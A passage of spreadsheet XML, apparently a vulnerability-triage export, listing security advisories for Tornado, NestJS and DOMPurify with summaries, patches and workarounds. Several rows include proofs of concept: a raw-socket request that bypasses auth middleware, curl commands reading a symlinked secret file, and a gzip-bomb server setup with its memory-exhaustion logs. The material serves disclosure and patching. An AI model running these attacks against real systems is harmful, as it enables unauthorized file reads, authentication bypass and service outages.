    self.path, sep, self.query = uri.partition("?")
try:
    self.arguments = parse_qs_bytes(
        self.query,
        keep_blank_values=True,
        max_num_fields=_DEFAULT_PARSE_BODY_CONFIG.urlencoded.max_arguments,
    )
except ValueError as e:
    raise HTTPInputError("Invalid query string: %s" % e) from e
```
This reuses the existing `ParseUrlEncodedConfig.max_arguments` default (1000) via the
module's `_DEFAULT_PARSE_BODY_CONFIG`, matching the POST-body limit and honoring any global
override via `set_parse_body_config()`. The `try/except` is necessary because — unlike
`parse_body_arguments`, which already wraps its call and converts `ValueError` into a clean
`HTTPInputError`/400 — the query-string call site currently has no such handling, so without
it, a request exceeding the limit would raise an uncaught `ValueError` instead of a clean 400.
Verified: with the fix applied, requests with ≤1000 query-string fields are unaffected;
requests with &gt;1000 fields are rejected with `400 Bad Request` (consistent with the POST-body
behavior); Tornado's own `httputil_test` and `web_test` suites (256 tests) pass unchanged.</t>
        </is>
      </c>
      <c r="T657" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-3hv7-mjh2-fv65</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>GHSA-96h4-vgxj-gvm2</t>
        </is>
      </c>
      <c r="D658" s="5" t="inlineStr"/>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K658" s="5" t="inlineStr"/>
      <c r="L658" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/microservices</t>
        </is>
      </c>
      <c r="M658" s="5" t="inlineStr">
        <is>
          <t>11.2.5, 12.0.3</t>
        </is>
      </c>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q658" s="5" t="inlineStr"/>
      <c r="R658" s="5" t="inlineStr"/>
      <c r="S658" s="5" t="inlineStr">
        <is>
          <t>## Summary
A peer that can open a TCP connection to a NestJS microservice using the built-in TCP
transport can make the server process allocate memory without limit, on either side of the
connection, until the process is killed by the OS or by its container memory limit. No
authentication, no credentials, and no valid message are required.
Applications are affected only if they start a microservice with `Transport.TCP` and the
transport's port is reachable by an untrusted peer.
## Affected versions
| Package | Affected | Patched |
|---|---|---|
| `@nestjs/microservices` | `&gt;= 12.0.0, &lt; 12.0.3` | **12.0.3** |
| `@nestjs/microservices` | `&lt; 11.2.5` | **11.2.5** |
The same code is present in the 10.x line and earlier. Those lines are end-of-life and
will not receive a patch; upgrade to a supported major.
Only `@nestjs/microservices` is affected. No other package needs updating for this issue.
## Details
Two independent paths let one peer grow the heap without bound.
### Partial packets are buffered with nothing to reap them
The TCP transport frames messages as `&lt;length&gt;#&lt;payload&gt;`. A peer may declare a length,
send part of the payload, and then stop. `JsonSocket` keeps the partial payload buffered
while it waits for the rest, and nothing ever reclaimed it: there was no socket timeout, no
cap on the number of connections, and no tracking of accepted sockets.
`maxBufferSize` did not close this. It caps a single connection, defaulting to 128M
characters, and is enforced per connection, so the effective ceiling was the number of
connections an attacker chose to open.
Ten connections that each send 20MB and then go silent:
| | rss | heapUsed |
|---|---|---|
| baseline | 152.3MB | 28.1MB |
| after 200MB sent, all stalled | 561.2MB | 229.5MB |
The memory was held for as long as the connections stayed open. Closing them released it,
so a peer could hold it indefinitely at negligible cost to itself.
### Response backpressure was ignored
`JsonSocket#handleSend` discarded the return value of `socket.write`. A peer that issues
requests and never reads the responses therefore made the process queue every response in
memory, with no ceiling and no signal to stop producing more.
Thirty requests from a client whose stream is paused, against a handler returning an 8MB
payload, grew rss from 152.4MB to 419.1MB. The amplification here is roughly 1:1, because
the response size is set by the application rather than by the attacker; the defect is that
the server buffers all of it rather than applying backpressure or giving up.
## Impact
An unauthenticated peer that can reach the transport's port can drive the process to an
out-of-memory kill. Under a container memory limit this is fast and repeatable, and it
restarts the pod rather than merely degrading it.
There is no confidentiality or integrity impact. Nothing is read, written, or executed;
the failure mode is availability only.
Applications are not affected if the TCP transport is not used, or if the transport's port
is reachable only by trusted peers.
## Patches
Upgrade `@nestjs/microservices` to **12.0.3** or **11.2.5**.
Three changes landed together:
- **A stall timer drops a peer that stops sending mid-packet.** It is armed only while a
  packet is partially received and is refreshed on every read, so a slow but progressing
  transfer is never interrupted and a peer sitting idle between packets is left alone.
  Configurable as `incompleteMessageTimeout`, default 30000ms.
- **Reading is suspended while a peer's outgoing buffer is backed up** and resumes on
  `drain`, so a peer that stops reading cannot keep issuing requests.
- **Responses queued for a peer that reads nothing are capped.** Suspending reads is not
  sufficient on its own, because message handlers are asynchronous: a burst of pipelined
  requests is dispatched before the first response is written, and those responses still
  queue. Configurable as `maxSendBufferSize`, default 128MB.
Both limits are configurable on the server and on the client, and either can be disabled by
setting it to `0`.
### Behaviour change
Both limits are enabled by default, following the precedent set by `maxBufferSize`. A peer
that stops sending mid-packet for 30 seconds, or that lets more than 128MB of responses
queue unread on a single connection, is now disconnected where previously it was not.
The send cap can also drop a peer that is genuinely reading, if responses are produced
faster than the socket drains for long enough. The default is set high for that reason.
Applications that stream very large responses to deliberately slow consumers should raise
`maxSendBufferSize` or set it to `0`.
## Workarounds
For anyone who cannot upgrade immediately:
- **Restrict who can reach the port.** The TCP transport is designed for trusted
  service-to-service traffic. A network policy, security group, or L4 firewall that limits
  the port to known peers removes the exposure entirely, and is worth doing regardless of
  version.
- **Lower `maxBufferSize`.** This reduces what a single connection can pin on the receive
  side. It does not bound the total, because the limit is per connection and the number of
  connections is not capped, and it does nothing for the response-queueing path.
- **Supply a custom `socketClass`.** An application-provided socket class can implement its
  own idle timeout and backpressure handling. This is the only pre-patch mitigation that
  addresses the sending side.
Setting a process memory limit does not mitigate this. It converts the failure from an
out-of-memory kill of the host into an out-of-memory kill of the process.
## Credit
Reported by Salman Aljardan, who provided a detailed write-up and self-contained proofs of
concept for each issue, and coordinated disclosure.</t>
        </is>
      </c>
      <c r="T658" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-96h4-vgxj-gvm2</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
      <c r="D659" s="5" t="inlineStr"/>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K659" s="5" t="inlineStr"/>
      <c r="L659" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/platform-fastify</t>
        </is>
      </c>
      <c r="M659" s="5" t="inlineStr">
        <is>
          <t>11.2.4, 12.0.2</t>
        </is>
      </c>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q659" s="5" t="inlineStr"/>
      <c r="R659" s="5" t="inlineStr"/>
      <c r="S659" s="5" t="inlineStr">
        <is>
          <t>| Field | Value |
| --- | --- |
| Ecosystem | npm |
| Package | `@nestjs/platform-fastify` |
| Affected versions | `&gt;= 12.0.0, &lt; 12.0.2` and `&lt; 11.2.4` |
| Patched versions | `12.0.2` and `11.2.4` (upgrade to `12.0.3` / `11.2.5`) |
### Summary
On the Fastify adapter, an HTTP request that uses an **absolute-form request target** (`GET http://host/path HTTP/1.1`
instead of `GET /path HTTP/1.1`) reaches the route handler without running the path-scoped Nest middleware bound to
that route. Applications that enforce authentication or authorization in middleware execute the protected handler
with those checks skipped.
### Impact
Any application that
- uses `@nestjs/platform-fastify`, and
- binds middleware to specific paths via `MiddlewareConsumer.forRoutes(...)` or `.exclude(...)`, and
- is reachable by a client that controls the raw request line.
Node's HTTP server accepts absolute-form targets, so no special server configuration is needed. Exposure is reduced
when a reverse proxy in front of the application rewrites the request target to origin-form, which most do.
Where the bypassed middleware performs authentication or authorization, the result is an authentication or
authorization bypass. Where it performs logging, rate limiting or body handling, those are silently skipped instead.
### Details
Fastify's router (`find-my-way`) resolves an absolute-form target to its path before matching, so the route handler
is dispatched normally. Two places on the middleware side matched against the **raw** request target instead:
1. The bundled copy of the `@fastify/middie` engine at `packages/platform-fastify/adapters/middie/fastify-middie.ts`.
   NestJS carried this fork to apply an earlier path-decoding fix and it did not track the upstream absolute-form fix
   released in `@fastify/middie@9.3.4`.
2. `FastifyAdapter`'s own re-check in `createMiddlewareFactory()`, which tests the middleware path regexp against
   `req.originalUrl`.
Both normalized and percent-decoded the target, but neither resolved absolute-form to a path, so the router and the
middleware layer disagreed about which path was being requested.
A second, related defect contributed. Because the adapter always passes `routerOptions` (to install the version
constraint), Fastify did not reflect the deprecated **top-level** router options (`ignoreTrailingSlash`,
`ignoreDuplicateSlashes`, `caseSensitive`, `useSemicolonDelimiter`) in `initialConfig.routerOptions`, which is what
the middleware engine reads. Applications passing those options at the top level had middleware normalize paths
differently from the router, which widened the mismatch.
### Proof of concept
```ts
@Controller('users')
export class UsersController {
  @Get()
  findAll() {
    return 'protected data';
  }
}
@Module({ controllers: [UsersController] })
export class AppModule implements NestModule {
  configure(consumer: MiddlewareConsumer) {
    consumer
      .apply((req, res) =&gt; res.end('blocked by auth middleware'))
      .forRoutes({ path: 'users', method: RequestMethod.GET });
  }
}
```
`supertest` and `light-my-request` always emit origin-form targets, so the request has to be written to the socket:
```js
const { connect } = require('node:net');
const socket = connect(3000, '127.0.0.1', () =&gt; {
  socket.write(
    'GET http://127.0.0.1:3000/users HTTP/1.1\r\n' +
      'Host: 127.0.0.1:3000\r\n' +
      'Connection: close\r\n\r\n',
  );
});
socket.pipe(process.stdout);
```
Observed on an affected version: `protected data` — the middleware did not run.
Expected, and observed on a patched version: `blocked by auth middleware`.
### Patches
Fixed in **12.0.2** and **11.2.4**. Upgrading to **12.0.3** or **11.2.5** is recommended.
- The bundled `@fastify/middie` fork was removed and the package now depends on `@fastify/middie@9.3.4`, which
  resolves absolute-form targets before matching.
- The adapter resolves absolute-form targets in its own route check, mirroring `find-my-way`.
- Deprecated top-level Fastify router options are folded into `routerOptions` so the middleware engine and the
  router normalize paths identically.
### Workarounds
If you cannot upgrade, reject non-origin-form request targets before middleware runs. Register the hook on the
Fastify instance **before the application is initialized**, so that it runs ahead of the middleware engine's own
`onRequest` hook, and confirm with the request above that the rejection takes effect:
```ts
const adapter = new FastifyAdapter();
adapter.getInstance().addHook('onRequest', (request, reply, done) =&gt; {
  const target = request.raw.url ?? '';
  // "*" is the legitimate request target of "OPTIONS * HTTP/1.1"
  if (target[0] !== '/' &amp;&amp; target !== '*') {
    reply.code(400).send();
    return;
  }
  done();
});
```
Rejecting or normalizing absolute-form targets at a reverse proxy in front of the application is equally effective.
### Credit
Reported by ZeroVuln Labs.</t>
        </is>
      </c>
      <c r="T659" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
      <c r="D660" s="5" t="inlineStr"/>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K660" s="5" t="inlineStr"/>
      <c r="L660" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M660" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q660" s="5" t="inlineStr"/>
      <c r="R660" s="5" t="inlineStr"/>
      <c r="S660" s="5" t="inlineStr">
        <is>
          <t>### Summary
StaticFileHandler allows an unauthenticated attacker to read arbitrary files from the server's filesystem by requesting a path that resolves to a symbolic link placed inside the static root directory. Any application that serves user-uploadable content, or whose static directory is populated by a build/deploy pipeline that creates symlinks (e.g. npm link, webpack, Docker volume mounts, CDN sync tools), is affected. An attacker who can trigger the creation of a symlink pointing outside the static root—or exploit one that already exists—can retrieve sensitive files such as /etc/passwd, private keys, configuration files, or application secrets.
### Details
The vulnerability is in tornado.web.StaticFileHandler, specifically in the interaction between two methods in [tornado/web.py](vscode-webview://1grdaaa6v64itrol06qu70pq3d1b9h9im5c3npvvc9snaprc1q9f/tornado/web.py):
- [get_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2932) uses `os.path.abspath()` to resolve the requested path:
- [validate_absolute_path](https://github.com/tornadoweb/tornado/blob/0ca3c5f8279d402b245718d16522bc18a8f5d958/tornado/web.py#L2935) uses the same `os.path.abspath()` on the root, then performs a string prefix check:
`os.path.abspath()` normalises . and .. segments but does not resolve symbolic links. As a result, a path like `/var/www/static/link` passes the `startswith("/var/www/static/")` check regardless of where `link` actually points.
Immediately after, `os.path.exists()` and `os.path.isfile()`  **do follow symlinks**, so the file they ultimately open is the symlink's target. The fix would be to replace os.path.abspath() with os.path.realpath() in both methods, so the resolved real path of the symlink target is validated against the root, not just its string representation inside the static directory.
### PoC
_Complete instructions, including specific configuration details, to reproduce the vulnerability._
Prerequisites: Python 3.x, Tornado installed.
1. Create the environment
```
mkdir -p /tmp/static
echo "DB_PASSWORD=s3cr3t" &gt; /tmp/secret.conf   
ln -s /tmp/secret.conf /tmp/static/config.conf 
```
2. Minimal vulnerable server (server.py):
```
import tornado.web, tornado.ioloop
app = tornado.web.Application([
    (r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "/tmp/static"}),
])
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
```
3. Exploit:
`curl http://localhost:8888/static/config.conf`
### Impact
Any application using StaticFileHandler is potentially affected if:
- the static directory contains symlinks pointing outside it (common with build tooling), or
- the application allows file uploads into the static directory without stripping symlinks.
An unauthenticated remote attacker can read any file readable by the process user: application secrets, private TLS keys, database credentials, /etc/shadow, SSH keys, or source code (depending on the process's filesystem permissions).</t>
        </is>
      </c>
      <c r="T660" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
      <c r="D661" s="5" t="inlineStr"/>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="inlineStr"/>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M661" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q661" s="5" t="inlineStr"/>
      <c r="R661" s="5" t="inlineStr"/>
      <c r="S661" s="5" t="inlineStr">
        <is>
          <t>An unbounded memory accumulation (decompression bomb) in `tornado.curl_httpclient.CurlAsyncHTTPClient` — the client-side sibling gap of CVE-2026-49855 — verified end-to-end on the 2026-08-15 master snapshot (`6.6.dev1`) and present unchanged in the latest release tag `v6.5.8` and on master (checked 2026-08-17). When a Tornado application configures the curl client (the documented deployment for proxy support / advanced TLS options) and `fetch()`es an attacker-chosen or attacker-compromised URL with default `decompress_response=True`, a malicious server replying `Content-Encoding: gzip` with a ~2.8 MB wire bomb drove the client's RSS from 30,884 kB to **1,032,100 kB (~1008 MB) in 3.18 s** (~350 MB/s, monotonic, no plateau) until the kernel OOM-killed the process (exit 137, cgroup `OOMKilled=true`) — with the transfer only 67% complete and **no client-side size check ever intervening**: `curl_httpclient.py` contains zero occurrences of `max_body_size`/`MAXFILESIZE`. The identical bomb against the default `SimpleAsyncHTTPClient` fails cleanly at ~65 MB, because every size gate CVE-2026-49855 added (compressed CL, chunked total, cumulative decompressed size — `http1connection.py:620,676,742`) lives in code the curl client never executes. This is a distinct component from the published advisory (which fixed `_GzipMessageDelegate`/`SimpleAsyncHTTPClient` only) and from the other curl-client advisories (credential handle-reuse GHSA-pw6j-qg29-8w7f, header CRLF GHSA-w235-7p84-xx57); the file's full commit history (latest 2026-06-17) shows no response-size work.
## Details
`tornado/curl_httpclient.py` (line numbers identical on master `6.6.dev1`, `v6.5.8`, and the audited snapshot):
```python
"buffer": BytesIO(),                                  # :202 — plain BytesIO, no accounting
...
else:
    write_function = buffer.write                     # :359 — every decompressed byte lands here
curl.setopt(pycurl.WRITEFUNCTION, write_function)     # :360
...
if request.decompress_response:                       # default True (HTTPRequest)
    curl.setopt(pycurl.ENCODING, "gzip,deflate")      # :373-374 — libcurl advertises + auto-decodes
```
libcurl decompresses the response **before** invoking `WRITEFUNCTION`, so the callback receives decompressed bytes, which are appended to an unbounded `BytesIO` until the transfer ends or the process dies. The only ceiling is `request_timeout` (default 20 s) — at zlib's hundreds of MB/s that still permits many GB of accumulation; the PoC raised it to 300 s and the 1 GiB cgroup cap was hit in 3.2 s regardless. There is no `pycurl.MAXFILESIZE`, no `max_buffer_size`/`max_body_size` plumbing (the constructor accepts no body-size option), and `streaming_callback` users fare no better (the callback variant at `:353-356` also performs zero accounting).
Contrast — `SimpleAsyncHTTPClient` path (`tornado/http1connection.py`), all absent from the curl path:
```python
if cast(int, content_length) &gt; self._max_body_size:        # :620  Content-Length gate
if total_size &gt; self._max_body_size:                       # :676  chunked total gate
if self._decompressed_body_size &gt; self._max_body_size:     # :742  CVE-2026-49855 decompressed gate
```
`SimpleAsyncHTTPClient.initialize()` defaults `max_buffer_size = 104857600` (100 MiB) with `max_body_size` defaulting to it (`simple_httpclient.py:117-121`); `CurlAsyncHTTPClient.initialize()` has no corresponding parameter at all.
Attack chain (attacker = malicious HTTP server; victim = any Tornado app doing `fetch()` on attacker-influenced URLs — URL fetchers, webhook processors, link previewers, RSS/probe pollers):
1. App configures `AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` (documented for proxy support; proxies are only supported with the curl client).
2. App calls `fetch("http://attacker/...")` with defaults → request advertises `Accept-Encoding: gzip,deflate`.
3. Attacker replies `200`, `Content-Encoding: gzip`, `Transfer-Encoding: chunked`, body = a gzip stream of zeros (4,174,525 wire bytes expanding to 4 GiB, 1029:1, sent in 64 KB chunks).
4. libcurl auto-decodes at ~350 MB/s into `buffer.write` with no size accounting → process RSS climbs linearly until OOM. The response need not complete: the client died with 2,818,048/4,174,525 wire bytes delivered (67%).
Variant without compression: `decompress_response=False` plus an endless streaming body (no Content-Length, no final chunk) feeds the same unaccounted `buffer.write` — this client never enforces any cap on any path.
## PoC
Verified end-to-end 2026-08-15 in a single container (cgroup `--memory 1g --memory-swap 1g` so the exhaustion endpoint is safe and fast to observe), two processes over a real TCP socket on `127.0.0.1:8081`: a raw-socket malicious server (`evil_server.py`, builds the 4 GiB-of-zeros gzip bomb once, serves it with chunked framing) and the Tornado victim (`victim_curl.py`, configures `CurlAsyncHTTPClient`, `fetch(..., request_timeout=300)`, samples `/proc/self/status` VmRSS every 0.2 s from a monitor thread so the curve survives the OOM kill).
### Build &amp; run the victim
```bash
git clone https://github.com/tornadoweb/tornado
cd tornado
pip install pycurl
python evil_server.py &amp;     # 127.0.0.1:8081; prints BOMB_BUILT wire_bytes=... ratio=... EVIL_LISTENING
python victim_curl.py       # victim: CurlAsyncHTTPClient fetch -&gt; expect linear RSS rise -&gt; OOM
python victim_simple.py     # control: default SimpleAsyncHTTPClient on the same bomb
```
Verified environment: debian:bookworm-slim, Python 3.11.2, python3-pycurl 7.45.2 (libcurl 7.88.1, zlib 1.2.13), tornado master snapshot `6.6.dev1` of 2026-08-15 run from the source tree (`sys.path`), container memory capped at 1 GiB. `curl_httpclient.py` verified byte-equivalent (still zero size-limit references) in tag `v6.5.8` and on master as of 2026-08-17.
### Reproduction steps
1. **Precondition — the documented curl-client deployment fetching a remote URL.** The vulnerability requires the application to use `CurlAsyncHTTPClient` (the standard configuration when proxy support or advanced TLS options are needed) with default `decompress_response=True`, and to fetch a URL whose server the attacker controls or has compromised. `victim_curl.py` implements exactly that (`AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` → `fetch()`), and the server log confirms the ENCODING path engaged — the victim's request arrived with `User-Agent: Mozilla/5.0 (compatible; pycurl)` and `Accept-Encoding: gzip,deflate`.
2. **Attack:** start `evil_server.py`, wait for `EVIL_LISTENING`, then run `victim_curl.py` (the fetch itself is the attack; no further interaction).
3. **Expected:** `victim_curl_rss.log` shows VmRSS 30,884 → 1,032,100 kB over 3.18 s, rising ~350 MB/s with no plateau; the container kills the victim (`exit 137`, docker `OOMKilled=true`); the server logs `CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525` — the accumulation is bounded only by available memory, never by a client-side check, and the 4 GiB payload was never fully delivered.
4. **Variant:** with `decompress_response=False` and an unterminated chunked body (server keeps sending forever), the same `buffer.write` path accumulates unbounded plain bytes — no compression needed; `request_timeout` only extends the ceiling.
5. **Control:** `victim_simple.py` fetches the identical bomb with the default `SimpleAsyncHTTPClient` → clean `FETCH_FAILED: HTTP 599: Connection closed`, RSS peak ~65 MB (24,984 → 66,712 kB), script exit 0 — the CVE-2026-49855 accounting in `http1connection.py` aborts the transfer, proving the gap is specific to the curl client.
### PoC source
Full PoC source (**victim_curl.py**, stdlib only, no dependencies): [victim_curl.py](https://gist.github.com/afldl/211c0e7af8175c2eabab53ed037c435d) (secret gist, unlisted).
The gist carries `evil_server.py` (bomb server), `victim_curl.py` (victim), `victim_simple.py` (control), and `REPRODUCE.md`.
### Captured output (2026-08-15 run, verbatim excerpts)
```
evil_server.log:
BOMB_BUILT wire_bytes=4174525 decompressed_bytes=4294967296 ratio=1029:1
EVIL_LISTENING 127.0.0.1:8081
REQUEST_FROM 127.0.0.1:57544 -&gt; GET /bomb HTTP/1.1
REQUEST_HEADERS:
GET /bomb HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (compatible; pycurl)
Accept: */*
Accept-Encoding: gzip,deflate
WIRE_SENT 65536/4174525
WIRE_SENT 2162688/4174525
CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525 err=ConnectionResetError(104, 'Connection reset by peer')
victim_curl_rss.log (VmRSS kB, every 0.2 s):
0.00  30884
0.61  231848
1.41  514720
2.22  794480
2.82 1000756
3.18 1032100        &lt;- last sample before kill
driver_f1.log:
timeout 240 python3 /e2e/F1/victim_curl.py ...  606 Killed
VICTIM_CURL_EXIT=137         # docker inspect -&gt; OomKilled: true
victim_simple.log (control, same bomb):
FETCH_FAILED: HTTP 599: Connection closed
SCRIPT_FINISHED_NORMALLY     # exit 0, VmRSS peak 66712 kB
```
Honest framing of the endpoint: the OOM kill at ~1008 MB was forced by the test's 1 GiB cgroup cap as the observation instrument; the "unbounded" claim rests on the linear no-plateau RSS curve, death at 67% wire delivery, and the absence of any size accounting in the code path — with more memory the transfer would have continued to the full 4 GiB payload.
## Impact
Denial of service (memory exhaustion) of any Tornado application that uses the curl HTTP client and fetches attacker-influenced URLs. A single ~4 MB response kills a 1 GiB process in ~3 s; wire cost scales as `available_memory / 1000`. Because the accumulation happens on the shared event loop's client, one malicious response takes down the entire application (all concurrently served users), and a slow endless-body variant drains memory gradually below detection thresholds. The attack requires no privileges, no user interaction, and only that the victim's configured client visits the attacker's origin.
### Suggested fix
Enforce a byte budget in the write path of `CurlAsyncHTTPClient`: wrap the `WRITEFUNCTION` (both the `buffer.write` branch and the `streaming_callback` branch) in a counter that aborts the transfer (`curl.setopt(pycurl.FAILONERROR)`-style cancellation or raising from the callback) once the received total exceeds `max_body_size`, plumbed from `initialize()` with the same 100 MiB default as `SimpleAsyncHTTPClient`. Because libcurl decompresses before the write callback, the counter naturally measures *decompressed* bytes — the same semantics as the CVE-2026-49855 fix. (`pycurl.MAXFILESIZE` alone is insufficient: it applies to the compressed transfer size.)
### Affected versions
- **&lt;= 6.5.8** (latest tag; the curl client has never had a response-size limit) and master (`6.6.dev1`, verified 2026-08-15/17).
- 6.5.6's CVE-2026-49855 fix covered `SimpleAsyncHTTPClient`/`http1connection.py` only; `curl_httpclient.py` was not touched.
## Credit
Reported by the diff/ambidiff security research effort (afldl).</t>
        </is>
      </c>
      <c r="T661" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>GHSA-p98j-92pf-mc4p</t>
        </is>
      </c>
      <c r="D662" s="5" t="inlineStr"/>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr">
        <is>
          <t>npm:dompurify</t>
        </is>
      </c>
      <c r="M662" s="5" t="inlineStr">
        <is>
          <t>3.4.16</t>
        </is>
      </c>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q662" s="5" t="inlineStr"/>
      <c r="R662" s="5" t="inlineStr"/>
      <c r="S662" s="5" t="inlineStr">
        <is>
          <t>## Summary
In `IN_PLACE` mode DOMPurify sanitizes the caller's live DOM subtree directly. To close a known hazard (GHSA-55q2-fjhq-7xh7), the library neutralizes any node a hook detaches during sanitization by stripping its subtree's non-allow-listed attributes, but this neutralization is wired only into the `beforeSanitizeElements` and `uponSanitizeElement` hook sites. An `afterSanitizeElements` or `afterSanitizeAttributes` hook that removes a non-root element (a documented, supported pattern) detaches that element's subtree with no neutralization, so descendant `on*` handlers remain armed on the caller's live tree after `sanitize()` returns, yielding DOM XSS. No special privilege is required beyond supplying markup to an application that uses `IN_PLACE` together with a node-removing afterSanitize hook.
## Root Cause
